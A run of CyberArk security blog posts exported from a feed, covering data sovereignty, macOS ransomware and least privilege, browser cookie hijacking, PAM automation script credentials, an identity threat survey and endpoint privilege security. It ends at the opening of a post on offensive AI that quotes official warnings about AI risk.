Additionally, as I mentioned above, there are now strict data protection regulations that must be complied with. GDPR is the biggest one, requiring any organizations operating in the European Union (EU) to follow specific rules when processing the personal data of EU residents. Adopted in 2016, GDPR became the inspiration for several other related regulations in other countries and states, such as the California Consumer Privacy Act (CCPA). As more countries introduce their own flavors of data privacy regulations, it becomes more challenging for organizations to ensure they are in compliance with each local law across their operations.

Beyond that, geopolitical turmoil has also brought data sovereignty to the forefront of organizations’ priority lists as new sanctions require them to quickly stop doing business and processing data in a country where they may have formerly had operations or customers. While that may have once been as simple as a bank closing its regional branch and locking the doors, that bank now has to think about all of the customers in that region who have access to their banking app, as well as all the employees who have access to company resources. How do you quickly revoke access if you need to and prove that you’re no longer operating in sanctioned areas?

Data sovereignty is critical to consider particularly if your organization is:

  • Expanding into a new country or region.
  • Merging with or acquiring a company that operates in a new country or region.
  • Undergoing digital transformation efforts moving you from on-premises infrastructure into the cloud (or multiple clouds).
  • Impacted by geopolitical sanctions that require you to stop doing business in a certain country or region.

Granular Access Policies

The challenge many organizations operating in multiple countries face is that they need to balance these data sovereignty requirements with the nature of their modern businesses, in which they’re often using centralized SaaS solutions for tasks like storing secrets, credentials and keys. These centralized solutions help increase operational efficiency for security teams, but organizations still have to ensure they are meeting the requirements of data sovereignty regulations.

Let’s take a look at an example. You’re a company that operates across Europe, including France and Germany. You use a centralized vault to secure your secrets (keys, credentials and more), and you have human users and machine identities that need to access the data in country-specific infrastructure using those secrets. But you need to ensure that France’s keys (and the data they can access) aren’t being granted to accounts in Germany, or vice versa, to remain in compliance with data sovereignty regulations.

Since you’re already using a modern approach for centralized secrets management and non-human access, consider granular access control of your secrets. Similar to role-based access control (RBAC), with these types of controls, you can set up location-based access policies that ensure that those who need access to the data (and only those who need access, based on that region’s laws and regulations) have access. That way you can satisfy compliance requirements while still enjoying the efficiency benefits of using a centralized solution that grants you visibility of your secrets across all of your environments.

Kurt Sand is general manager of DevSecOps at CyberArk.

]]>
macOS Least Privilege Best Practices to Combat Rising Ransomware https://www.cyberark.com/blog/macos-least-privilege-best-practices-to-combat-rising-ransomware/ Tue, 27 Jun 2023 19:36:41 +0000 https://www.cyberark.com/?p=145694 macOS Least Privilege Best Practices

Ransomware accounts for one in every four breaches, and increasingly, it’s going after enterprise macOS users.

macOS Ransomware Attacks are Mounting

macOS Ransomware Attacks are Mounting

Historically, it didn’t make much financial sense for attackers to create Mac-specific malware since most company machines ran on Windows or Linux, but that’s changing. Macs now make up about a quarter of enterprise endpoints and malware as a service is readily available for every operating system. In the workforce, Mac users are often power users such as developers or executives who have admin rights and can access sensitive data and systems. This makes them highly attractive targets for criminal organizations seeking out the most impactful users – and necessitates robust endpoint privilege security controls.

Recent reports suggest that opportunistic attackers are paying closer attention to macOS – from new information stealers that grab passwords and extract data from web browsers and cryptocurrency wallets to the first-ever Mac ransomware samples linked to the notorious LockBit gang.

5 Reasons EDR/XDR Alone Can’t Block Mac Attacks

Since most cyberattacks originate at the endpoint, many security teams rely on endpoint detection and response (EDR) or extended detection and response (XDR) tools to protect against macOS ransomware and other cybersecurity threats. Unfortunately, adversaries count on this, which is why organizations still suffer costly and damaging endpoint attacks despite hefty endpoint security investments.

Here are five reasons why conventional endpoint security tools aren’t enough to stop macOS attacks:

  1. Many macOS attacks involve administrative privileges. Attackers routinely look for ways to exploit privileged accounts to deploy ransomware and achieve their goals. While EDR tools play an important defense-in-depth role, they aren’t designed with privileged attackers in mind.
  2. EDR solutions focus on known threats. EDR tools suss out threats by monitoring and analyzing various endpoint activities (i.e., processes, registry settings, file operations, network traffic) for red flags. They typically use signature-based detection methods to do this (looking at file signatures, threat-class signatures, string signatures and/or behavior signatures). But this type of detection doesn’t recognize unknown malware variants or zero-day exploits, and it takes time for EDR vendors to roll out updates addressing newly discovered attacks. This can create security gaps since attackers constantly change up their tactics.
  3. Attackers can bypass EDR/XDR tools. For instance, MITRE ATT&CK T1070 and T1562 and other
    other adversarial techniques involving privileged accounts are often used to circumvent popular endpoint security products. And since most EDRs hook into Gatekeeper, Apple’s native software inspection technology, attackers have also devised a variety of methods to circumvent the tool’s security checks to execute ransomware and other malicious content.
  4. Speaking of bypassing security checks, EDR solutions also can’t stop attackers from skirting or tampering with other endpoint security tools in place. A recently identified strain of macOS malware dubbed “Rustbucket” shows why this matters. Rustbucket sneakily circulates via a legitimate PDF viewer app. Since it’s an unknown strain, EDR tools are unlikely to flag it as malicious, and since it only tries to infect the target device after it runs the correct PDF file, antivirus probably won’t detect it either.
  5. Processing the massive volume of security events generated on endpoints – then creating (and continuously evolving) policies that follow security best practices – can be very challenging and time consuming, especially for large organizations with diverse environments.

How Least Privilege Control Reduces the macOS Attack Surface

Reactively analyzing complex data sets for known attack patterns isn’t an effective (or sustainable) macOS protection strategy. Instead, the focus should be on establishing fundamental identity security controls to proactively defend against privileged attacks of all kinds – known and unknown. This comes down to least privilege.

endpoint attack vector

Least Privilege to Eliminate Standing Local Admin Rights

No user should have local admin rights. But as any security professional knows, removing them all is a gargantuan task. It’s also a move that’s sure to frustrate Mac users and complicate IT operations. This is where AI-powered policy creation and consistent least privilege control are key for achieving balance – by automatically removing local admin rights, contextually authenticating identities and dynamically authorizing temporary, on-demand privilege elevation instead. Some applications require the user to be a local admin or have a local admin account. In these instances, admin rights can be granted just in time, then taken away as soon as the task is complete.

Least Privilege for Smarter Application Control

Mac users often need flexibility to download and use applications from the internet. But this creates risk. How do you protect the environment from an application that could be malicious or could attempt to download other apps that are undesirable? Here, conditional policy-based application control helps security teams create scenarios for every user group, from DevOps to HR, while defending against unknown malware variants without impairing legitimate applications. If a Mac power user needs to utilize an unfamiliar app, they can do in a secure, sandboxed environment while access to the internet and/or intranet, network file shares and other processes’ memory is blocked.

Least Privilege to Block Credential Theft

Credential theft remains security professionals’ No. 1 risk area and the root cause of most breaches. By stealing credentials and compromising identities, attackers can move deeper into an environment and closer to their goals. Defending credentials is a critical piece of the endpoint security puzzle. By instituting granular, policy-based least privilege controls, organizations can effectively safeguard credentials cached by macOS and other operating systems, password managers, web browsers, SSO solutions and other applications.

Least Privilege to Stop Ransomware at the Start

A strong mix of endpoint privilege security, privilege threat protection and application control can block ransomware actors before they can even get started. If an attacker does slip through the cracks, these controls will greatly complicate their mission by preventing additional credential compromise, privilege escalation, lateral movement and code execution, while hindering data encryption and exfiltration by ensuring that only approved content handlers can access files.

Trusted entities including the U.S. Cybersecurity and Infrastructure Security Agency (CISA) promote best practices including local admin rights removal, role-specific least privilege enforcement and credential theft protection across all enterprise endpoints – from workstations to servers, to physical and virtual infrastructures on premises and in the cloud. As ransomware and other threats continue to rise, foundational endpoint security controls are a must no matter what operating systems are in play.

To learn how CyberArk Endpoint Privilege Manager can help your organization improve macOS protection and proactively block ransomware and other cyber incidents, read our whitepaper “Tackle EDR Gaps Against Cyberattacks with Endpoint Privilege Security.

Francis Yom is a regional least privilege specialist at CyberArk.

]]>
Securing the Web Browser in an Identity-focused Threat Landscape https://www.cyberark.com/blog/securing-the-web-browser-in-an-identity-focused-threat-landscape/ Fri, 23 Jun 2023 13:10:39 +0000 https://www.cyberark.com/?p=145655 Dark web browser close-up on screen

For more than 30 years, we’ve been living in a world where one of the most widely-used applications is the web browser. Despite being designed primarily for consumer use, browsers have become essential to how enterprises operate – serving as the connective tissue between identities, applications and data. And yet, despite all of the advancements leading to today’s digital and cloud-centric world, one of the least secure applications is … the browser.

In this post, we’ll discuss why browsers are highly vulnerable to attacks, how today’s threat actors are exploiting them and what IT security teams can do about it.

Why Is the Browser So Unsafe? Start With Identities and What They Can Access

In today’s threat landscape, the nature of privilege is evolving. It’s no longer just IT admins who require protection based on their access to sensitive resources. Now any user within an organization can become privileged, gaining access to highly sensitive information like customer data, financial records and intellectual property – in many cases, more access than they actually need.

And one of the most common ways employees gain this type of access is through their browsers, where they access web-based applications, virtual collaboration tools and shared drives where documents can be accessed, downloaded and changed – among other gateways to organizations’ highest-value data.

All of this activity has been accelerating in recent years, as the way people work – and the various places and devices they work from – continue to evolve. According to a recent CyberArk survey, virtually all (99%) of IT security decision-makers agree they’ll face an identity-related compromise in the year ahead. Among the 2,300 respondents surveyed, the top three cited reasons are:

  • Digital transformation (58%).
  • Hybrid working practices (44%).
  • Third-party usage (44%).

It’s no coincidence these variables rise to the top. They represent an ecosystem of users – internal and external – who contribute virtually to help drive key initiatives, from cloud migrations to new digital products. Each contributor is tied to multiple digital identities used to authenticate and access what they need. And that’s where the risk factor lies. These identities – along with their information, poorly-protected credentials and access permissions – can be compromised through users’ web browsers.

Next-level Risk: How Attackers Can Easily Infiltrate Browser Sessions

To this point, we’ve covered risks around the people (and, in turn, identities) using unsecured browsers across your organization. But what are the specific risks tied to the browser technologies themselves? For starters, some risks are well-known in IT security circles:

  • Browsers enable users to install unverified extensions that can secretly upload data to attacker-controlled servers.
  • They provide insider users with built-in tools to circumvent preventative controls.
  • They allow users to store passwords to all of their applications – work-related and personal – in browser-based tools designed for convenience over protection.

But let’s dig deeper into the risks from an attacker’s point of view.

One of the most dangerous and prominent browser-centric attack methods involves cookies – specifically, attacks centered on stealing, forging, altering or manipulating cookies from users’ web sessions to gain unauthorized access to sensitive resources. The CyberArk Red Team has seen a significant increase in this post-authentication attack vector in which the threat actor:

  1. Acts as an imposter, hijacking the cookie after it has been authenticated.
  2. Replays the cookie in the session so they can bypass multi-factor authentication with a very low detection rate.
  3. Hijacks the in-progress session with an aim toward stealing data, moving laterally and escalating privilege and disrupting operations through malware.

In a way, browser session cookies are constantly defying Zero Trust principles, existing as an automatic bypass from continuous verification. After a user’s initial authentication, the website or web-based application they’re using establishes a cookie that allows repeat visits, without requiring reauthentication. It’s like the unspoken agreements we might have with a front desk attendant after checking into a building once. Want to come back inside again and again? All you need is a quick nod and a “you’re all set” from the attendant, who’s more interested in checking their phone than verifying you’re the same person from earlier.

Even without admin privileges, attackers can hijack cookies once they’ve compromised a user’s device. And once those cookies fall into an attacker’s hands, they become the privileged access gift that keeps on giving – because cookies are saved not only within users’ identities but their specific privileges too. Meanwhile, end users’ tendency to use their work devices for personal use – calling back to our point about how work is evolving – compounds the risk. This practice can potentially enable attackers to gain access to both personal and enterprise data.

And if attackers aren’t using the cookies themselves, they’re buying and selling them on the dark web. Threat actors don’t need to be sophisticated enough to compromise an endpoint to broker access in – they can just buy a cookie and move on to tactics such as phishing, password compromise and all-out attacks.

How to Defend Against Cookie Theft and Session Hijacking

As part of a unified identity security approach, organizations can reduce risk by implementing enterprise-wide, cookieless browsing.

You might wonder if that’s even possible. After all, cookies seem ubiquitous and inevitable. How many times have you been greeted by that beloved “Do you accept all cookies?” prompt today alone? It’s less of a question and more of a begrudged reality.

In short, yes, it’s possible. With cookieless browsing, the cookies are stored on a secure server to allow for seamless use by individuals who are still able to navigate without their cookies being available for theft. This also allows organizations to lock down data and enable security at the user level to protect the most sensitive information. Cookieless browsing enables users to access and use web-based resources in a more secure way, making it virtually impossible for hackers or third parties to steal, hijack and do damage. And with respect to privacy, we can ensure that users’ web sessions, data and accounts remain confidential and secure.

Looking beyond cookies, it’s essential to take a big-picture view of what needs protecting in the browser environment. This includes having the controls and capabilities in place to secure access to business-developed web apps, cloud management consoles and SaaS-based tools and services with controls tailored to each user. And the best approach embodies key identity security principles. This includes ensuring the browser itself has native integration with key defense-in-depth solutions for enabling seamless and secure access while infusing intelligent privilege controls to an organization’s wide array of browser users (aka employees).

A few examples of identity security capabilities that can work together to secure browsers, but certainly not all, include: single sign-on (SSO), adaptive multi-factor authentication (MFA), enterprise-grade password protection, web session monitoring and controls for securing vulnerable endpoints.

Bringing It All Together: What It Takes to Secure Browsers

While somehow the web browser has existed for 30 years without a serious level of protection, we can change that now. Above all, it takes new thinking on how to build and continuously protect browsers, the identities using them and all the sensitive resources these widely used applications enable access to. We believe the modern browser can and should be built to balance protection and productivity. And this is possible through an integrated identity security approach and platform.

Check out this recap of the conference, where our leaders and industry experts shared their vision on how to secure web browsers – and where CyberArk announced a new innovation: the first identity security-based enterprise browser.

John Natale is a senior content marketing manager at CyberArk. 

]]>
PAM Automation Scripts: Don’t Forget to Secure Admin Credentials https://www.cyberark.com/blog/pam-automation-scripts-dont-forget-to-secure-admin-credentials/ Fri, 16 Jun 2023 15:15:45 +0000 https://www.cyberark.com/?p=145561 Securing PAM Automation

While IT executives understand the essential role privileged access management (PAM) solutions play in their organization’s overall security strategy, they’ve also continued to ask their PAM administrators to do more with less resources. To meet these additional asks, PAM admins have automated routine PAM tasks using scripts. PAM automation scripts can significantly lessen the burden on PAM admins and enable organizations to scale PAM usage across their entire enterprise. But securing PAM automation scripts and the admin credentials they hold is paramount.

After all, a hard-coded credential in a PowerShell script gave cyberattackers the foothold they needed to access Uber’s PAM solution and elevate their privileges to devastating effect in the 2022 breach. While automation scripts are often simple, they can hold the keys to other high-value resources within the company – including root credentials, cloud access keys and every credential in between from infrastructure orchestrators, admin credentials, service accounts and other configuration management tools. If those keys aren’t secured, attackers can easily use the unsecured credential in these scripts to find a way into an organization’s most sensitive areas.

Why Are PAM Automation Scripts So Powerful?

A PAM admin’s daily responsibilities typically revolve around the lifecycles of privileged users in their organization and require high levels of privilege. For example, when a privileged user joins the organization, the PAM admin has to add them to the right safes and grant them the necessary permissions they need to perform their privileged tasks. If a user leaves an organization, all that access has to be revoked to ensure the organization remains secure.

These processes typically involve multiple steps, all of which take time for the admin. Consider just one example of a new employee joining the organization. Of course, there are various approaches, but in this example, the PAM admin must:

  • Map that employee to an Active Directory (AD) group, giving them access to the software tools that they need for their job.
  • Map the employee to a group that grants them the right level of access to all of the safes that have the credentials necessary to work in those software tools. (Another approach is to map the employee to each individual safe they need access to, but you can see how that could quickly get overwhelming.)

This gets even more complex when you consider named accounts. For a named account, a personal safe is created for that new employee. Then the admin has to assign the proper permissions and add that new employee’s account to that personal safe, then put proper rotation policies around that.

And this is just the basics. As organizations scale, their PAM usage grows with them. They may have to onboard or offboard a large number of users at one time, particularly in the following situations:

  • Mergers and acquisitions, when employees are added by the hundreds (and sometimes thousands).
  • Large joiner/leaver events, including large-scale layoffs, which create a significant overhead from a compliance perspective.
  • Implementation of a PAM solution, including expanding users from just domain and local admins to groups like networking and cloud.

Admins need very high levels of privilege to complete these tasks. But do admins really want to do these repetitive tasks manually? And what’s the potential for errors with all of these manual steps? At some point, the growth reaches a point where automation isn’t just a nice-to-have – it’s essential for security teams who don’t have the resources to dedicate to all the mundane, day-to-day tasks required. You especially need this type of efficiency as you move beyond securing the human element and bring in all the machine identities that need to be secured – including virtual machines (VMs), service accounts in the cloud and robotic process automation (RPA) bots.

Security Risks for PAM Automation

Automation helps remove the risk of human error and saves PAM admins both time and budget that they can spend on other tasks. But while these scripts themselves may be small and simple, performing only minor tasks, they can expose critical systems to attackers. Hard-coded credentials in scripts can easily be stolen by attackers who gain access to the scripts (i.e., through a compromised network share, as happened in the Uber breach) and leveraged elsewhere. Scripts can also be easily copied, replicated and shared, with any hard-coded credentials shared along with them. Additionally, someone could potentially post a copy to a repository, exposing those credentials.

The danger increases as many of these scripts have high levels of privileged access and can thus cause a large amount of damage if unsecured credentials fall into attackers’ hands.

Best Practices for Securing PAM Automation

Here are some steps you can take to ensure that your PAM automation processes are secure:

  • Secure credentials used in scripts. No matter how inconsequential a script might seem, the value to the attacker is in the power of the embedded privileged credential(s). The script can be used as a jumping-off point for attackers if the right credential is embedded inside. Ensure that the credentials used in your automation scripts are vaulted and delivered at the time they are needed, not hard coded into the script.
  • Regularly rotate credentials. Establish policies to regularly rotate credentials. That way, even if there are hard-coded credentials in automation scripts, they quickly become invalid.
  • Automate credential management. Reduce the risk of human error by moving to an automated, on-demand process. Instead of having to manually manage credentials and add/remove users, you can have event-driven activities that are tied to your joiner/mover/leaver processes, including automated requests for approval.
  • Gain visibility. Ensure that you have oversight into what these automation scripts are doing – what resources they have access to, when they’re accessing and what they’re doing once they access the PAM solution. This is especially important for automation scripts that perform highly privileged activities like creating a new safe. Knowing exactly what these scripts are doing across your organization (and who is running them) can help you flag any risky activity and revoke access if needed.
  • Enforce least privilege. Don’t let these scripts have more access than they need. Follow the principle of least privilege so that these scripts have only the necessary privileges to perform their tasks, nothing more.
  • Practice defense in depth. Use the principles of Zero Trust and enact multiple layers of defense. Something like forced human approval with multi-factor authentication (MFA) can provide another hurdle for attackers who may have gained access to one of your automation scripts.

Identity Security for Automation

Naturally, PAM admins spend most of their time working within PAM solutions. Yet they don’t work in a vacuum, and as user workflows (as well as their own) become increasingly automated, PAM admins need additional functions and features to do their jobs. But if more tools mean more work, it defeats automation’s whole purpose.

This is just one reason why organizations are working to consolidate their identity security tools, bringing lifecycle management, identity automation and orchestration and centralized secrets management together in one comprehensive platform.

With this approach, PAM admins can access a host of built-in features that enable a trifecta of secure, automated and simplified functions – from automatically managing the credential lifecycle with REST APIs, to rotating privileged admin credentials used in script, to onboarding users.

Seamless integration with other tools across the organization’s broader security stack helps teams make smarter, faster decisions. For instance, when a third-party tool detects an event of a specific level of severity, it can automatically trigger the identity security platform to take specific corrective action.

But above all else please ensure that the credentials used in your organization’s PAM automation scripts are secured. After all, they contain the privileged credentials used to assign privileged access to other users and thus an attacker’s dream.

Learn more about how CyberArk Conjur Cloud and CyberArk Identity Flows help you automate PAM functions and secure the PAM admin credentials used by automation scripts.

Jed Knopf is a CyberArk Solutions Architect, as well as a former PAM admin. Sharon Abarbanel is a Manager, Product Management, CyberArk Secrets Manager.

 

]]>
Top Six Identity Security Risks Compounding Cyber Debt and Expanding the Attack Surface https://www.cyberark.com/blog/top-six-identity-security-risks-compounding-cyber-debt-and-expanding-the-attack-surface/ Tue, 13 Jun 2023 12:31:05 +0000 https://www.cyberark.com/?p=145374 Laptop screen displaying cover of the CyberArk 2023 Identity Security Threat Landscape Report

The prolonged period of low-capital costs and widely available funding may be over, yet digital adoption persists as business leaders seek to unlock efficiencies and innovation everywhere. This is driving exponential but often unsecure identity growth in the enterprise and putting existing levels of cyber debt at risk of compounding as investment in digital and cloud initiatives continues to outpace cybersecurity spend. It’s on cybersecurity professionals – who must do more, faster, with less than ever – to keep this organizational cyber debt under control while defending a rapidly expanding and unsecured identity-centric attack surface.

Released today, the CyberArk 2023 Identity Security Threat Landscape Report offers a glimpse into cybersecurity professionals’ world. It’s a massive realm of complex, interconnected environments under constant attack from shapeshifting threats – shadowed by global upheaval, economic uncertainty and rapid technological change, including the evolution of artificial intelligence (AI). Here, boundaries offer scarce protection. Instead, identities – human (employees, third-party users, customers) and machine (applications, infrastructure, bots and workloads) – are the first and last line of defense.

The total number of identities in a typical enterprise is expected to grow by 2.4x in 2023 alone. It’s a demanding job to manage them all while making sure users can securely access resources at the right time, from anywhere, on any device. Out of 2,300 global security decision-makers surveyed, virtually all (99%) say they’ll face an identity-related compromise in the year ahead, stemming from economic-driven cutbacks, geopolitical factors, cloud adoption and hybrid working. Meanwhile, 63% say the highest-sensitivity access for employees, such as IT admins, is not adequately secured today.

Many of these security teams are already understaffed and under-resourced, and nearly one-third of respondents say cybersecurity skills gaps hinder security efforts. As corporate belt-tightening continues, respondents cite growing challenges across six distinct areas of identity security risk:

1. People. Humans are always a security wildcard, and many incidents stem back to user error or intentional misuse. Seventy-four percent of respondents are concerned about confidential information loss stemming from employees, ex-employees and third-party vendors. They point to third parties (partners, consultants and service providers) as the riskiest human identities.

2. Workforce upheaval. Sixty-eight percent of respondents say layoffs and higher levels of employee churn will create new security issues. For example, 58% report instances of exiting users saving sensitive or confidential work documents outside of policy. Every time an employee leaves, the IT team must remove access permissions from the various applications they used. Malicious actors (sometimes former disgruntled employees) count on things slipping through the cracks during manual offboarding processes. One wrongly provisioned, overprivileged or orphaned account is all they need.

3. Machine identities. Due to increasing IT complexity, 62% of security teams operate with limited visibility across their environment. This makes it difficult to understand not only who is accessing sensitive data and assets but also what they are accessing. Last year, we learned machine identities outnumber human ones 45:1. There’s a pressing need to secure them all and secure them fast, yet doing so without impacting users is a tricky balancing act. Forty-two percent of respondents agree that managing and securing both human and machine identity types is equally difficult. This may be why 65% either took steps to protect machine identities last year or plan to do so in the next 12 months.

4. Business systems. When considering which exposed assets could cause the most damage and where they “live,” 42% of respondents say business-critical applications top their list of at-risk systems. Yet more than half of all respondents admit that identities are unmanaged and unprotected in revenue-generating customer-facing applications, enterprise resource planning (ERP), customer relationship management (CRM) and financial management software. This isn’t even the worst-protected environment: only 25% of respondents say sensitive access to bots and robotic process automation (RPA) is secured. Since approaching half of all identities have sensitive access to high-value data or services, often through SaaS applications and automated processes, these findings are particularly concerning.

5. Software development. With a need for speed and flexibility, software developers are often given more access than required – especially in lean times when rapid innovation is key to survival. Perhaps security teams don’t have the bandwidth to handle continuous access requests or developers are applying extra pressure. Regardless, 77% of respondents say developers have too many privileges – making these human identities highly attractive targets. Thirty-eight percent say development is the area where unknown, unmanaged identities create the most risk. Further, 69% say robotic process automation (RPA) and bot deployments are being slowed due to security concerns.

6. Identity security toolsets. Security professionals’ jobs are further complicated by a patchwork of heterogeneous tools from various vendors, creating identity security gaps in some areas and inefficient overlaps in others. Sixty-seven percent of respondents say they currently use tools from up to 40 different identity security vendors. Given the nature of cybersecurity, more enterprises are consolidating their partnerships, and their trust, to a smaller number of long-term vendor partners that can deliver more comprehensive, interoperable solutions that address more of their challenges.

Download The CyberArk 2023 Identity Security Threat Landscape Report

Our latest research also explores the 2023 attack landscape, including industry-specific trends and growing AI angst, and demonstrates the longtail effect of today’s cybersecurity decisions on future success. It shows how forward-looking organizations are prioritizing and tackling key areas of identity risk to amplify security impact.

Download the full report to learn how placing identity at the heart of a Zero Trust cybersecurity approach can help your organization weather the current storm, avoid compounding levels of cyber debt and face the future with confidence.

Clarence Hinton is chief strategy officer, head of corporate development at CyberArk. 

]]>
How Endpoint Privilege Security Helps Organizations Protect Against Threats https://www.cyberark.com/blog/how-endpoint-privilege-security-helps-organizations-protect-against-threats/ Fri, 09 Jun 2023 19:30:33 +0000 https://www.cyberark.com/?p=145347 Layered image loosely representing multilayered endpoint privilege security controls.

Protecting endpoints is more important than ever, as existing threats like ransomware continue to damage organizations and emerging threats like AI-driven attacks add to the problem.

As attackers find new ways to exploit an organization’s vulnerabilities, IT security teams find themselves under pressure to act quickly, often searching for new tools. However, when security solutions are bolted together hastily, problems arise, such as:

  • The solutions are siloed and cannot share data on potential threats and turn insights into action.
  • They also cannot apply an effective control for securing one type of identity (privileged user) to another type of identity (standard user).

This is why we advocate for identity security, both as a strategic approach and as a platform, to address gaps that often appear between patchy security technologies. Identity security provides a solid foundation and fuses the once-siloed security components into an integrated platform that’s designed to be impenetrable, multi-layered and identity-first.

For this to be truly successful, it’s important to take a unified approach. You must break down those silos by contextually authenticating all identities and then dynamically authorizing the least amount of privilege required for any change or action in the environment.

In other words, identity security controls are dynamic and adaptive in nature, so they can ensure the right level of access is granted based on risk. Looking at the following graphic, you’ll notice an integrated identity security approach spans six domains: workforce and customer access, endpoint privilege security, privileged access management, secrets management, cloud security and identity management.

In this blog post, I want to zoom in on one of those domains: endpoint privilege security. Let’s explore the role endpoint privilege security plays in an identity security platform, how it differs from endpoint privilege management and what capabilities and controls you should look for in a solution.

Graphical depiction of CyberArk's identity security platform

What Is Endpoint Privilege Security?

Endpoint privilege security ensures that organizations take control over unmanaged privilege on the endpoints to significantly reduce the area of attack and defend from threats such as ransomware.

It builds upon the existing access control components found in operating systems — accounts, account groups, file and folder permissions and access control lists. Granted, these controls are powerful because they are built into operating systems’ kernels. But they can be hard to manage in complex environments and at scale. (Worth noting, they also come very cheap computationally as they don’t require components such as complex heuristics, pattern extraction and matching algorithms, emulators, behavioral analyzers and such.) By introducing an efficient management layer on top of these mechanisms, endpoint privilege security can deliver foundational, granular and efficient security for any endpoint, a high level of visibility and control and role-specific least privilege.

Look Beyond Labels

Before we dive into the functional breakdown of endpoint privilege security, let’s briefly talk about naming. Within the IT security community – leaders, practitioners, analysts and more – there’s some complexity and confusion around how we name, define and refer to the act of securing endpoints. To be clear, I’m not pointing any fingers! However, it’s important to get the naming right when you’re determining the strategic approaches, controls and solutions needed to defend against threats.

A traditional way of looking at privilege management on the endpoint is to consider it a part of privileged access management (PAM) that is “landed” onto an organization’s endpoints. Through this perspective, many consider managing access to applications – the ability to run them – to be the main functionality. Therefore, this category is traditionally called “privilege elevation and delegation management” (PEDM). But there’s a problem: the word “endpoint” is notably missing from the name. Perhaps this why our industry more often calls these tools “endpoint privilege management” solutions.

I, however, argue that another, even more important word is missing from the fold, and that’s “security.” If you ask me, there’s a big difference between endpoint privilege management and endpoint privilege security.

  • Endpoint privilege management helps organizations align to a key security concept – say it with me: “Nobody should work under an administrator account!” – and not lose too much in the process. Here, organizations have taken an important step in reducing risk, but by following up with “management,” the focus shifts to standard users and merely helps automate some IT helpdesk tasks as support tickets begin to flow in from users who’ve lost admin rights. You’ve checked one box on the security checklist but not much more – all while creating additional operational friction and load.
  • Endpoint privilege security, on the other hand, requires implementing least privilege to the extreme, while also removing operational friction as much as possible. Least privilege is enforced across the board for standard users, advanced users and administrators alike. And it is role-specific, which means instead of only having minimum restrictions that can allow just about anything to fly under the radar, we can now really push this concept and implement security tailored for each role in a company – and they will love it! Least privilege is absolutely essential to endpoint (and not only endpoint) security because it limits the attacker’s ability to reach endpoints, gain persistence, collect and exfiltrate data, rely on existing tools, tamper with other programs and operating systems, conceal their presence and wipe evidence, tamper with security and deliver impact. This is, of course, a short version – but you can read more in this blog post.

Endpoint privilege security controls not only users’ permissions but those for applications as well, including execution chain, access to specific resources, ability to access files and so on. It also ensures that most critical data can be protected from any and every application, thus securing credentials, hashes, security tokens, passwords, cookies and so on across the operating system credential stores, third-party applications and browsers.

As noted, a litmus test to help tell endpoint privilege management apart from endpoint privilege security centers on a simple question: who is the end user you’re focusing on? If it’s standard (regular) users only, you are looking at endpoint privilege management. But if you’re focusing on every user – standard users and admins alike – that’s endpoint privilege security.

File this under “Why should our industry ever make things easy?” Many solutions in the market, each with their own different functionality sets and maturity levels, have some variation of “endpoint,” “privilege” and “manager” in the name.

But since we could argue that some endpoint providers belong in the “management” category while others belong in “security,” we’ll have to look beyond names. “Security” is different from any other word, as it is not a declaration or simple matter of branding – it’s a commitment. As such, security must traverse every aspect of a solution’s design, implementation, functioning and audit capabilities.

Here are some pointers you might find useful for evaluating endpoint privilege management/security controls and capabilities, keeping in mind how certain design decisions might affect users’ experience and, maybe more importantly, your organization’s security and compliance.

Endpoint Privilege Security – Controls and Functionalities to Look For

In an integrated identity security approach, every domain – from endpoint to cloud – is strengthened by forging bonds with each other’s functionalities and controls. This sounds like a cliché, but synergies do truly emerge thanks to tight integrations between identity security components. One example is a sudden tightening of elevation policies when a user’s actions, environment and location trigger adaptive, continuous authentication, risk threshold logic. The user will be asked to re-authenticate to perform a high-risk action when they wouldn’t normally get that challenge.

This tight integration really reduces operational friction while helping secure users’ environments and locations. Here are four areas of functionality to consider when vetting endpoint privilege security providers, keeping those silo-breaking bonds in mind.

  • Functionality traditionally attributed to PAM -> PEDM:
    • Zero Standing Privileges – all elevations happen just in time, according to policy
    • Comprehensive privilege control of child processes
    • Timed administrative sessions (just-in-time)
    • Application and processes discovery and control
    • Conditional privilege control policy elevation
    • Privileged account discovery and removal/demotion
    • Support for break-glass scenarios (offline devices, rollback of system configurations, etc.)
    • Policy and event audit for application events and privileged actions
  • Functionality from endpoint protection platforms (EPP):
    • Application execution control (can it launch?)
    • Application access control (what can it interact with — access to resources, such as intranet, internet, memory?)
    • Application privilege control (can it elevate?)
    • Prevention of exploits that abuse the execution chain
    • File threat analysis, leveraging cloud-based reputation services
    • Ransomware protection
    • Ability to automate detection and response actions based on threat level and auto-execution of threat response playbooks
  • Functionality from cloud workload protection (CWP):
    • That of EPP (outlined above)
    • API-based control (API-first implementation) for extensive automation
    • Cloud workload hardening
    • Ability to protect virtual machines, particularly persistent and non-persistent virtual desktops
    • Ability to protect Desktop as a Service (DaaS) instances
    • Ability to protect instances in public cloud infrastructures
    • Ability to integrate with the cloud fabric to enable automated procurement, scaling and interoperation with cloud-native services
  • Functionality from identity threat detection and response (ITDR):
    • Active defense of user credentials (passwords, password hashes, login-key pairs, sign-in certificates)
    • Active defense of session tokens (browser cookies)
    • Active defense of security and authentication tokens
    • Privilege deception
    • Identity-specific, context-rich event recording

Bringing It All Together: Endpoint Privilege Security

To recap, in today’s threat landscape, it’s essential to do more than manage program elevation on endpoints. Organizations must enforce role-specific least privilege and protect machines with multilayered endpoint privilege security controls centered around identity. In this post, we explored the fundamentals of this critical, but often missing, area and the integral role it plays in a modern cybersecurity program.

Learn more about how CyberArk’s endpoint privilege security solution and its role in an integrated identity security platform help organizations enforce least privilege and protect against threats such as ransomware.

Andrey Pozhogin is a senior product marketing manager at CyberArk. 

]]>
Analyzing 3 Offensive AI Attack Scenarios https://www.cyberark.com/blog/analyzing-3-offensive-ai-attack-scenarios/ Thu, 08 Jun 2023 07:10:02 +0000 https://www.cyberark.com/?p=145318 Robotic hand pressing a keyboard on a laptop 3D rendering

Artificial intelligence (AI) is transforming modern society at unprecedented speed. It can do your homework, help you make better investment decisions, turn your selfie into a Renaissance painting or write code on your behalf. While ChatGPT and other generative AI tools can be powerful forces for good, they’ve also unleashed a tsunami of attacker innovation and concerns are mounting quickly. In the last week alone, several government officials and AI leaders have issued warnings about the growing AI threat:

  • The Center for AI Safety released this one-sentence statement signed by more than 350 prominent AI figures: “Mitigating the risk of extinction from AI should be a global priority alongside other societal-scale risks such as pandemics and nuclear war.”
  • The head of the U.S. Federal Trade Commission emphasized the need for vigilance, noting that the FTC is already seeing AI used to “turbocharge” fraud and scams.
  • A panel of United Nations experts called for “greater transparency, oversight and regulation to address the negative impacts of new and emerging digital tools and online spaces on human rights.”
